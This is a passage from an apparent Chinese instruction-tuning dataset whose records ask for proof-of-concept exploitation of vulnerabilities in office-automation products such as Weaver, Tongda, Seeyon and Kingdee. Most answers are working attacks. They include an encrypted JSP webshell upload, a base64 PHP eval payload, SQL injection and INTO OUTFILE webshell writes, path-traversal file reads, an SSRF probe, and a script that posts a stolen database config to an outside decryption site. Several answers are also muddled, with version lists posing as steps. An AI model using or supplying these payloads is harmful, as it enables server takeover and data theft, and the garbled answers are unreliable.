zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\ndnt: 1\nx-forwarded-for: 127.0.0.1\nConnection: close\n\n------WebKitFormBoundary6XgyjB6SeCArD3Hc\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jsp\"\nContent-Type: application/octet-stream\n\n<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n------WebKitFormBoundary6XgyjB6SeCArD3Hc--\n3. Content-Length: 397\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA uploadOperation.jsp 任意文件上传.md"}
    921. 

  921. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v11.8 api.ali.php 任意文件上传漏洞\n漏洞描述:通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件控制服务器\n影响版本:``` 通达OA v11.8 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. POST /mobile/api/api.ali.php HTTP/1.1\nHost: \nUser-Agent: Go-http-client/1.1\nContent-Length: 422\nContent-Type: multipart/form-data; boundary=502f67681799b07e4de6b503655f5cae\nAccept-Encoding: gzip\n\n--502f67681799b07e4de6b503655f5cae\nContent-Disposition: form-data; name=\"file\"; filename=\"fb6790f4.json\"\nContent-Type: application/octet-stream\n\n{\"modular\":\"AllVariable\",\"a\":\"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==\",\"dataAnalysis\":\"{\\\"a\\\":\\\"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*\\\"}\"}\n--502f67681799b07e4de6b503655f5cae--\n2. ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==\nfile_put_contents('../../fb6790f4.php','');\n3. /inc/package/work.php?id=../../../../../myoa/attach/approve_center/2109/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v11.8 api.ali.php 任意文件上传漏洞.md"}
    922. 

  922. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远OA 帆软组件 ReportServer 目录遍历漏洞\n漏洞描述:致远OA 帆软组件 ReportServer接口存在目录遍历漏洞,攻击者通过漏洞可以获取服务器敏感信息\n影响版本:``` 致远OA 帆软组件 ```\n网络测绘:``` title=\"致远A8-V5协同管理软件 V6.1sp1\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. title=\"致远A8-V5协同管理软件 V6.1sp1\"\n2. /seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../&currentUserName=admin&currentUserId=1&isWebReport=true\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远OA 帆软组件 ReportServer 目录遍历漏洞.md"}
    923. 

  923. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:启莱OA CloseMsg.aspx SQL注入漏洞\n漏洞描述:启莱OA CloseMsg.aspx文件存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息\n影响版本:``` 启莱OA ```\n网络测绘:``` app=\"启莱OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1\n2. http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/启莱OA CloseMsg.aspx SQL注入漏洞.md"}
    924. 

  924. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA DBconfigReader.jsp 数据库配置信息泄漏漏洞\n漏洞描述:2019年10月24日,360CERT监测到友商发布了泛微e-cology OA数据库配置信息泄漏漏洞预警,漏洞等级中。 攻击者可通过存在漏洞的页面直接获取到数据库配置信息。如果攻击者可直接访问数据库,则可直接获取用户数据,甚至可以直接控制数据库服务器。 360CERT判断漏洞等级为中,危害面/影响面低。建议使用泛微e-cology OA的用户及时安装最新补丁,以免遭受黑客攻击。\n影响版本:``` 目前已知为8.100.0531,不排除其他版本,包括不限于EC7.0、EC8.0、EC9.0版 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 目前已知为8.100.0531,不排除其他版本,包括不限于EC7.0、EC8.0、EC9.0版\n2. import base64\nimport requests\nimport ast\n\ndef req(url):\n\theaders =  {\n        'Content-Type':'application/x-www-form-urlencoded',\n        'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',\n        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n    }\n\n\tr1 = requests.get(url,headers=headers).content\n\ts = r1.replace('\\r\\n','')\n\tres1 = base64.b64encode(s)\n\t\n\tpostdata = {\n\t\t'data':res1,\n\t\t'type':'des',\n\t\t'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'\n\t}\n\tu = 'http://tool.chacuo.net/cryptdes'\n\tr2 = requests.post(u,data=postdata,headers=headers).content\t\n\tres2 = ast.literal_eval(r2)\n\t\n\treturn res2['data']\n\nurl = 'http://xxx.xxx.xxx.xxx:8888//mobile/DBconfigReader.jsp'\nprint req(url)\n3. 'data':res1,\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA DBconfigReader.jsp 数据库配置信息泄漏漏洞.md"}
    925. 

  925. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA sysinterfacecodeEdit.jsp 任意文件上传漏洞\n漏洞描述:泛微OA sysinterface/codeEdit.jsp 页面任意文件上传导致可以上传恶意文件\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 较老版本,目前无准确版本\n2. filename=******5308.java&filetype=javafilename为文件名称 为空时会自动创建一个\nString fileid = \"Ewv\";<br>\n    String readonly = \"\";<br>\n    boolean isCreate = false;<br>\n    if(StringHelper.isEmpty(fileName)) {<br>\n     Date ndate = new Date();<br>\n     SimpleDateFormat sf = new SimpleDateFormat(\"yyyyMMddHHmmss\");<br>\n     String datetime = sf.format(ndate);<br>\n     fileid = fileid + datetime;<br>\n     fileName= fileid + \".\" + filetype;<br>\n     isCreate = true;<br>\n    } else {<br>\n        int pointIndex = fileName.indexOf(\".\");<br>\n        if(pointIndex > -1) {<br>\n            fileid = fileName.substring(0,pointIndex);<br>\n        }}\n3. [泛微OA未授权可导致GetShell](https://www.uedbox.com/post/15730/)\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA sysinterfacecodeEdit.jsp 任意文件上传漏洞.md"}
    926. 

  926. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金蝶OA server_file 目录遍历漏洞\n漏洞描述:金蝶OA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息\n影响版本:``` 金蝶OA ```\n网络测绘:``` app=\"Kingdee-EAS\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"Kingdee-EAS\"\n2. /appmonitor/protected/selector/server_file/files?folder=/&suffix=\n\n# Windows服务器\nappmonitor/protected/selector/server_file/files?folder=C://&suffix=\n\n# Linux服务器\nappmonitor/protected/selector/server_file/files?folder=/&suffix=\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/金蝶OA server_file 目录遍历漏洞.md"}
    927. 

  927. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:信呼OA qcloudCosAction.php 任意文件上传漏洞\n漏洞描述:信呼 OA <=v2.3.2 版本在`webmain\\task\\runt\\qcloudCosAction.php`云存储下调用了`qcloudCosClassAction`方法,导致文件上传漏洞。通过该漏洞,攻击者可突破上传限制,上传 php 文件获取服务器shell。 利用前提是已经获取了用户名/登陆口令。 参考链接: - https://github.com/rainrocka/xinhu\n影响版本:``` 信呼OA <= 2.3.2 ```\n网络测绘:``` app=\"信呼协同办公系统\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 信呼OA <= 2.3.2\n2. app=\"信呼协同办公系统\"\n3. 任务资源 → 文件传送 → 相关文件\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/信呼OA qcloudCosAction.php 任意文件上传漏洞.md"}
    928. 

  928. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:万户OA downloadhttp.jsp 任意文件下载漏洞\n漏洞描述:万户OA downloadhttp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件\n影响版本:``` 万户OA ```\n网络测绘:``` app=\"万户网络-ezOFFICE\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"万户网络-ezOFFICE\"\n2. /defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp\n3. /defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/万户OA downloadhttp.jsp 任意文件下载漏洞.md"}
    929. 

  929. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:万户OA DownloadServlet 任意文件读取漏洞\n漏洞描述:万户OA DownloadServlet接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器中的敏感文件,获取敏感信息\n影响版本:``` 万户OA ```\n网络测绘:``` app=\"万户网络-ezOFFICE\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"万户网络-ezOFFICE\"\n2. /defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/万户OA DownloadServlet 任意文件读取漏洞.md"}
    930. 

  930. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金蝶OA 云星空 ScpSupRegHandler 任意文件上传漏洞\n漏洞描述:金蝶OA 云星空 ScpSupRegHandler 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取服务器权限\n影响版本:金蝶OA 云星空\n网络测绘:``` app=\"金蝶云星空-管理中心\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"金蝶云星空-管理中心\"\n2. POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1\nHost: \nAccept-Encoding: identity\nContent-Length: 973\nAccept-Language: zh-CN,zh;q=0.8\nAccept: */*\nCache-Control: max-age=0\nContent-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061\n\n--2ac719f8e29343df94aa4ab49e456061\nContent-Disposition: form-data; name=\"dbId_v\"\n\n.\n--2ac719f8e29343df94aa4ab49e456061\nContent-Disposition: form-data; name=\"FID\"\n\n2022\n--2ac719f8e29343df94aa4ab49e456061\nContent-Disposition: form-data; name=\"FAtt\"; filename=\"../../../../uploadfiles/test.ashx.\"\nContent-Type: text/plain\n\n<%@ WebHandler Language=\"C#\" Class=\"TestHandler\" %>\n        using System;\n        using System.Web;\n        public class TestHandler : IHttpHandler {\n            public void\n            ProcessRequest (HttpContext context) {\n                context.Response.ContentType= \"text/plain\";\n                context.Response.Write(\"Test\");\n            }\n            public bool IsReusable {\n                get {return false; }\n            }\n        }\n--2ac719f8e29343df94aa4ab49e456061--\n3. /K3Cloud/uploadfiles/Test.ashx\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/金蝶OA 云星空 ScpSupRegHandler 任意文件上传漏洞.md"}
    931. 

  931. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:万户OA DocumentEdit.jsp SQL注入漏洞\n漏洞描述:万户OA DocumentEdit.jsp文件存在SQL注入漏洞,攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息\n影响版本:``` 万户OA ```\n网络测绘:``` app=\"万户网络-ezOFFICE\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"万户网络-ezOFFICE\"\n2. /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:5'--\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/万户OA DocumentEdit.jsp SQL注入漏洞.md"}
    932. 

  932. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远OA A8 status.jsp 信息泄露漏洞\n漏洞描述:致远OA A8-m 存在状态监控页面信息泄露,攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击\n影响版本:``` 致远OA A8-m ```\n网络测绘:``` title=\"A8-m\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. title=\"A8-m\"\n2. /seeyon/management/status.jsp\n3. /seeyon/management/status.jsp\n/seeyon/logs/login.log\n/seeyon/logs/v3x.log\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远OA A8 status.jsp 信息泄露漏洞.md"}
    933. 

  933. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远OA A6 test.jsp SQL注入漏洞\n漏洞描述:致远OA A6 test.jsp 存在sql注入漏洞,并可以通过注入写入webshell文件控制服务器\n影响版本:``` 致远OA A6 ```\n网络测绘:``` title=\"致远A8+协同管理软件.A6\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. title=\"致远A8+协同管理软件.A6\"\n2. http://xxx.xxx.xxx.xxx/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20database())\n3. <%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.getRealPath(\"\\\\\")+request.getParameter(\"f\"))).write(request.getParameter(\"t\").getBytes());%>\n\nHEX编码\n\n3C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C5C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E\n/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex(%273C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E%27)%20%20into%20outfile%20%27E:/Program Files/UFseeyon/OA/tomcat/webapps/yyoa/test_upload.jsp%27\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远OA A6 test.jsp SQL注入漏洞.md"}
    934. 

  934. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞\n漏洞描述:金和OA C6 存在越权信息泄露漏洞,普通用户登录后可以通过遍历ID编号获取管理员及其他用户的敏感信息\n影响版本:``` 金和OA C6 ```\n网络测绘:``` app=\"Jinher-OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"Jinher-OA\"\n2. http://xxx.xxx.xxx.xxx/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=RY120330\n3. https://mp.weixin.qq.com/s/gwHQVIZeMWfT8a5lBX_4WA\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞.md"}
    935. 

  935. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远OA A8 htmlofficeservlet 任意文件上传漏洞\n漏洞描述:该漏洞最早于6月26号左右,有安全厂商发出漏洞预警。 远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务器写入任意文件,写入成功后可执行任意系统命令进而控制目标服务器。\n影响版本:``` 致远A8-V5协同管理软件V6.1sp1 致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3 致远A8+协同管理软件V7.1 ```\n网络测绘:``` title=\"致远A8-V5协同管理软件 V6.1sp1\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. title=\"致远A8-V5协同管理软件 V6.1sp1\"\n2. 致远A8-V5协同管理软件V6.1sp1\n致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3\n致远A8+协同管理软件V7.1\n3. /seeyon/htmlofficeservlet\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远OA A8 htmlofficeservlet 任意文件上传漏洞.md"}
    936. 

  936. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Cology HrmCareerApplyPerView.jsp SQL注入漏洞\n漏洞描述:泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感文件\n影响版本:``` 泛微OA E-Cology ```\n网络测绘:``` app=\"泛微-协同办公OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 泛微OA E-Cology\n2. app=\"泛微-协同办公OA\"\n3. /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 union select 1,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Cology HrmCareerApplyPerView.jsp SQL注入漏洞.md"}
    937. 

  937. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞\n漏洞描述:用友 U8 OA getSessionList.jsp文件,通过漏洞攻击者可以获取数据库中管理员的账户信息\n影响版本:``` 用友 U8 OA ```\n网络测绘:``` \"用友U8-OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. /yyoa/ext/https/getSessionList.jsp?cmd=getAll\n2. 用友 U8 OA getSessionList.jsp文件,通过漏洞攻击者可以获取数据库中管理员的账户信息\n3. /yyoa/ext/https/getSessionList.jsp?cmd=getAll\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞.md"}
    938. 

  938. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:一米OA getfile.jsp 任意文件读取漏洞\n漏洞描述:一米OA getfile.jsp文件过滤不足,导致任意文件读取漏洞\n影响版本:``` 一米OA ```\n网络测绘:``` app=\"一米OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. <%@ page contentType=\"text/html;charset=utf-8\" %>\n<%@page import=\"cn.js.fan.util.*\" %>\n<%@page import=\"cn.js.fan.web.Global\" %>\n<%@page import=\"com.redmoon.oa.*\" %>\n<%@page import=\"java.io.*\" %>\n<jsp:useBean id=\"fchar\" scope=\"page\" class=\"cn.js.fan.util.StrUtil\"/>\n<jsp:useBean id=\"fsecurity\" scope=\"page\" class=\"cn.js.fan.security.SecurityUtil\"/>\n<jsp:useBean id=\"privilege\" scope=\"page\" class=\"com.redmoon.oa.pvg.Privilege\"/>\n<%\n    String user = ParamUtil.get(request, \"user\");\n    if (\"\".equals(user)) {\n        if (!privilege.isUserPrivValid(request, \"read\")) {\n            System.out.println(\"警告非法用户,你无访问此页的权限!\");\n            return;\n        }\n    }\n\n    String filename = ParamUtil.get(request, \"filename\");\n    String extname = request.getParameter(\"extname\");\n    String prop = request.getParameter(\"prop\");\n    if (filename == null) {\n        System.out.println(\"缺少文件名!\");\n        return;\n    }\n\n    filename = filename + \".\" + extname;\n\n    Config cfg = new Config();\n    String noticefilepath;\n    if (\"activex\".equals(prop)) {\n        noticefilepath = prop;\n    } else {\n        noticefilepath = cfg.get(prop);\n    }\n\n    String filePath = Global.getRealPath() + \"/\" + noticefilepath + \"/\" + filename;\n    if (\"li\".equals(prop)) {\n        filePath = Global.getRealPath() + \"WEB-INF/\" + prop + filename;\n    }\n\n    response.setContentType(\"application/\" + extname);\n    response.setHeader(\"Content-disposition\", \"attachment; filename=\" + filename);\n\n    BufferedInputStream bis = null;\n    BufferedOutputStream bos = null;\n\n    try {\n        bis = new BufferedInputStream(new FileInputStream(filePath));\n        bos = new BufferedOutputStream(response.getOutputStream());\n\n        byte[] buff = new byte[2048];\n        int bytesRead;\n\n        while (-1 != (bytesRead = bis.read(buff, 0, buff.length))) {\n            bos.write(buff, 0, bytesRead);\n        }\n\n    } catch (final IOException e) {\n        System.out.println(\"出现IOException.\" + e);\n    } finally {\n        if (bis != null)\n            bis.close();\n        if (bos != null)\n            bos.close();\n    }\n\n    out.clear();\n    out = pageContext.pushBody();\n%>\n2. if (\"\".equals(user)) {\n        if (!privilege.isUserPrivValid(request, \"read\")) {\n            System.out.println(\"警告非法用户,你无访问此页的权限!\");\n            return;\n        }\n    }\n3. String filename = ParamUtil.get(request, \"filename\");\nString extname = request.getParameter(\"extname\");\nString prop = request.getParameter(\"prop\");\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/一米OA getfile.jsp 任意文件读取漏洞.md"}
    939. 

  939. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v11.7 auth_mobi.php 在线用户登录漏洞\n漏洞描述:通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统\n影响版本:``` 通达OA < v11.7 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 通达OA < v11.7\n2. <?php\n\nfunction relogin()\n{\n    echo _('RELOGIN');\n    exit;\n}\nob_start();\ninclude_once 'inc/session.php';\ninclude_once 'inc/conn.php';\ninclude_once 'inc/utility.php';\nif ($isAvatar == '1' && $uid != '' && $P_VER != '') {\n    $sql = 'SELECT SID FROM user_online WHERE UID = \\'' . $uid . '\\' and CLIENT = \\'' . $P_VER . '\\'';\n    $cursor = exequery(TD::conn(), $sql);\n    if ($row = mysql_fetch_array($cursor)) {\n        $P = $row['SID'];\n    }\n}\nif ($P == '') {\n    $P = $_COOKIE['PHPSESSID'];\n    if ($P == '') {\n        relogin();\n        exit;\n    }\n}\nif (preg_match('/[^a-z0-9;]+/i', $P)) {\n    echo _('非法参数');\n    exit;\n}\nif (strpos($P, ';') !== false) {\n    $MY_ARRAY = explode(';', $P);\n    $P = trim($MY_ARRAY[1]);\n}\nsession_id($P);\nsession_start();\nsession_write_close();\nif ($_SESSION['LOGIN_USER_ID'] == '' || $_SESSION['LOGIN_UID'] == '') {\n    relogin();\n}\n3. $sql = 'SELECT SID FROM user_online WHERE UID = \\'' . $uid . '\\' and CLIENT = \\'' . $P_VER . '\\'';\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v11.7 auth_mobi.php 在线用户登录漏洞.md"}
    940. 

  940. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远OA A6 initDataAssess.jsp 用户敏感信息泄露\n影响版本:``` 致远OA A6 ```\n网络测绘:``` title=\"致远A8+协同管理软件.A6\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. title=\"致远A8+协同管理软件.A6\"\n2. http://xxx.xxx.xxx.xxx/yyoa/assess/js/initDataAssess.jsp\n3. http://xxx.xxx.xxx.xxx/yyoa/assess/js/initDataAssess.jsp\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远OA A6 initDataAssess.jsp 用户敏感信息泄露.md"}
    941. 

  941. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远OA A6 DownExcelBeanServlet 用户敏感信息泄露\n漏洞描述:致远OA A6 存在某个未授权的接口导致任意访问者可下载OA中的用户信息\n影响版本:``` 致远OA A6 ```\n网络测绘:``` title=\"致远A8+协同管理软件.A6\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. title=\"致远A8+协同管理软件.A6\"\n2. /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远OA A6 DownExcelBeanServlet 用户敏感信息泄露.md"}
    942. 

  942. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞\n漏洞描述:用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器权限,攻击服务器\n影响版本:用友 U8 CRM客户关系管理系统\n网络测绘:``` web.body=\"用友U8CRM\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. web.body=\"用友U8CRM\"\n2. POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1\nHost:\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ\n\n------WebKitFormBoundarykS5RKgl8t3nwInMQ\nContent-Disposition: form-data; name=\"file\"; filename=\"test.php \"\nContent-Type: text/plain\n\n<?php phpinfo();?>\n\n------WebKitFormBoundarykS5RKgl8t3nwInMQ\n3. /tmpfile/updD24D.tmp.php\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞.md"}
    943. 

  943. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:帆软报表 2012 SSRF漏洞\n漏洞描述:帆软报表 2012 存在信息泄露漏洞,通过访问特定的Url获取造成SSRF\n影响版本:``` 帆软报表 2012 ```\n网络测绘:``` body=\"down.download?FM_SYS_ID\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. body=\"down.download?FM_SYS_ID\"\n2. /ReportServer?op=resource&resource=0m0m6k.dnslog.cn\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/帆软报表 2012 SSRF漏洞.md"}
    944. 

  944. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-cology WorkflowServiceXml RCE\n漏洞描述:泛微E-cology OA系统的WorkflowServiceXml接口可被未授权访问,攻击者调用该接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程代码执行\n影响版本:``` E-cology <= 9.0 ```\n网络测绘:``` app=\"泛微-协同办公OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. E-cology <= 9.0\n2. app=\"泛微-协同办公OA\"\n3. <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"webservices.services.weaver.com.cn\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <web:doCreateWorkflowRequest>\n    <web:string></web:string>\n        <web:string>2</web:string>\n      </web:doCreateWorkflowRequest>\n   </soapenv:Body>\n</soapenv:Envelope>\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-cology WorkflowServiceXml RCE.md"}
    945. 

